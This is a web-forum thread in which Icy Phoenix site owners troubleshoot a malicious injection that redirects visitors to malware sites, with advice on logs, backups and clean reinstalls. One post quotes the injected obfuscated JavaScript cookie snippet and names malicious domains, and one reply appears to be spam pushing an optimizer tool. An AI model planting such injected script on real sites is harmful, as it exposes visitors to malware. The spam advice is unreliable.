Malware? Spyware? Help Please!


Subject: Malware? Spyware? Help Please!
Hey all,

When I open my website, and view my website code, I can see this above my website!
Does anybody know what files may be infected? Or how this could be placed on my website?

Thanks in advance...

Spoiler: [ Show ]

Profile PM  
Subject: Re: Malware? Spyware? Help Please!
Surely something like ur host ...

Profile PM  
Subject: Re: Malware? Spyware? Help Please!
Damn... that's an injection that could be in any file.

Check common.php, auth.php, page_header.php, page_tail.php and all overall_header.tpl of your templates.

Can you please check in the access log to see which request has been used for that?

How Informpro states, it could also be an hosting issue, but we cannot be 100% sure until you have access to the log files of your server and check how the injection has been performed.

Please report here if you find something else.

I'll do my best to help you with this issue.

Subject: Re: Malware? Spyware? Help Please!
Mighty Gorgon wrote: [View Post]
Damn... that's an injection that could be in any file.

Check common.php, auth.php, page_header.php, page_tail.php and all overall_header.tpl of your templates.

Can you please check in the access log to see which request has been used for that?

How Informpro states, it could also be an hosting issue, but we cannot be 100% sure until you have access to the log files of your server and check how the injection has been performed.

Please report here if you find something else.

I'll do my best to help you with this issue.

Hmm, the problem might be bigger than I thought... My whole website appears to be offline now. But, it could also mean I have to pay my yearly invoice hehe.
Would be bad if I lost all my data.

I figured out a part of the problem:
All .html files where indeed infected with weird kind of codes (at least, not standard in IP and I did not insert those codes).
What I did is:
- I searched all .html files (with the use of FileZilla) en deleted them.

But I could not get the first line removed. Yesterday, I checked most common files:
- index files (not only index.php, but several index files where infected.)

Next, when you removed them: do not forget to change your password!!

But, with the host, or just my website being offline, I can not check those other files.

I read on the internet the iframe could indeed be in any file...
I will post here in what files it could be posted.

Im getting two suspicious loadings while loading the website (DO NOT CLICK THE LINKS OR GO TO THE WEBSITE! SPAM/ MALWARE Sites!)
-Pescasearch.info & erapost.

I do not know how to check the access log, is that the one you see instantly when logged in to IP admin panel?

Will keep you all posted. I read on several blogs they have this problem currently on a lot of sites.
And with Google Chrome introducing the anti-malware/phishing windows, you would not want this insertion on your Icy phoenix!

Thanks for the information MG & Informpro, if you by any change got some other ideas which files could be infected, please let me know!

-OwnageWorld

Profile PM  
Subject: Re: Malware? Spyware? Help Please!
Without having access to your files it is almost impossible for me to understand where the injection is.

Recently injections also use cookies to store their injections... so you should also clean your cookies and possibly change the name of the cookie in ACP.

Access log is not the one included in Icy Phoenix, as it is almost useless to identify such kind of issues. You need the APACHE ACCESS LOG, ask your provider for that. Do you have a rough idea on when the hacking has been performed? That will be useful as well while looking at the logs.

Make a full backup (both DB and files) as soon as you can... that is really important.

Also recently, some new injections are performed at hosting level... so even if you are using software which is known being secure, you may be injected.

Please provide further informations as soon as you have them.

Thanks, and good luck.

Subject: Re: Malware? Spyware? Help Please!
I'm having similar atacks on my site on these days, and I'm investigating how to stop them. My situation is a little bit different, because they are using cookies to infect the site, and not changing file or using SQL injection on DB. All my files and DB are clean.
At this moment, the only thing that I tought is that the problem is on server side, but my hosting still say that the issue is on the CMS (another site with IP on the same serve is affected from same problem). I think I'll change my hosting soon, but I continue to investigate, to know better if there a re a way to stop this kind of attacks, because it's very annoying to have an attack with a redirect without see any file changed!!! :|

The way that they using are simple: they intercept the site cookie with session ID (I remove for security some numbers from ID codes):
Code: [Download] [Hide] [Select]
n_sess_id8c2f6bdc702ee928d7b9d0535d******www.mysite.it/1600138298854430031586317765440300******


and create another cookie using the ID session for another site:
Code: [Download] [Hide] [Select]
red1makkahintro.com/15363916258944300316863196715440300******


and insert on pages (don't tell me how) a script similar to this:
Code: [Download] [Hide] [Select]
<script type="text/javascript" language="javascript"> var lprcb=new Date( ); lprcb.setTime(lprcb.getTime( )+12*60*60*1000); document.cookie="\x6e\x5f\x73\x65\x73s\x5f\x69d\x3d\x30\x64\x38\x657cba\x65\x64\x63\x39\x61\x34\x35\x371\x61\x62e\x37\x61\x37\x32\x35\x36\x64\x31e\x65\x617"+"\x3b\x20path=/;\x20expire\x73="+lprcb.toGMTString( ); </script>


to redirect who are visiting that page to a fake antivirus site, that contain a lot of malware ready to donwload on the visitor pc........
This is all I have take to understand better this problem, and I hope it can help some people that could have similar issue, and MG if he could try the way to block similar attacks in some way...........

I'll tell you some news when I'll have.

Subject: Re: Malware? Spyware? Help Please!
Mighty Gorgon wrote: [View Post]
Without having access to your files it is almost impossible for me to understand where the injection is.

Recently injections also use cookies to store their injections... so you should also clean your cookies and possibly change the name of the cookie in ACP.

Access log is not the one included in Icy Phoenix, as it is almost useless to identify such kind of issues. You need the APACHE ACCESS LOG, ask your provider for that. Do you have a rough idea on when the hacking has been performed? That will be useful as well while looking at the logs.

Make a full backup (both DB and files) as soon as you can... that is really important.

Also recently, some new injections are performed at hosting level... so even if you are using software which is known being secure, you may be injected.

Please provide further informations as soon as you have them.

Thanks, and good luck.

Hey MG,

I got full access to my website again, my host told me I used 3x more bandwidth then the 3 years before...
So that's weird too!

If you want, you can check all my files and have access to the FTP and whatever you need.
PM me or e-mail me if so!

I would like to solve this problem, and it would be great if we know what would be the infected files...

I checked almost around 90 files manually, who are most common in IP, but I really don't know anymore...

Thanks in advance,


Stefan/ OwnageWorld

Profile PM  
Subject: Re: Malware? Spyware? Help Please!
Check where the code inject is (template)

Profile PM  
Subject: Re: Malware? Spyware? Help Please!
What I should do is, make a full backup of the site, and replace all files with a clean installation.

After having done that, keep a copy of the fresh files on your local PC and if you get injected again, please download the full site and make a compare with WinMerge to check which files have been modified.

I have no other clue now apart of the fact that some Icy Phoenix sites have been injected recently, but it seemed to be hosting related.

Subject: Re: Malware? Spyware? Help Please!
u need some gud antispyware .
I have 1 good application installed on my system
Advanced System Optimizer...,
along with an Antispyware it also have other Privacy Protection tool.
You shud try this as it blocks the spyware b4 it can enter your system.
and will also clean the infections if any.
y dnt u try this..

Last edited by Mighty Gorgon on Sat 24 Jul, 2010 11:58; edited 1 time in total
Subject: Re: Malware? Spyware? Help Please!
My site hasn't been attacked yet, but it has increased its bandwith consume seriously due to some "Yandex" and "Infopath" bots... maybe the next Icy robots.txt should do something with them :roll:

Profile PM  

Page 1 of 1


  
You cannot post new topics
You cannot reply to topics
You cannot edit your posts
You cannot delete your posts
You cannot vote in polls
You cannot attach files
You can download files
You cannot post calendar events

   

This is a "Lo-Fi" version of our main content. To view the full version with more information, formatting and images, please click here.

Powered by Icy Phoenix based on phpBB
Generation Time: 0.2199s (PHP: 10% SQL: 90%)
SQL queries: 16 - Debug Off - GZIP Enabled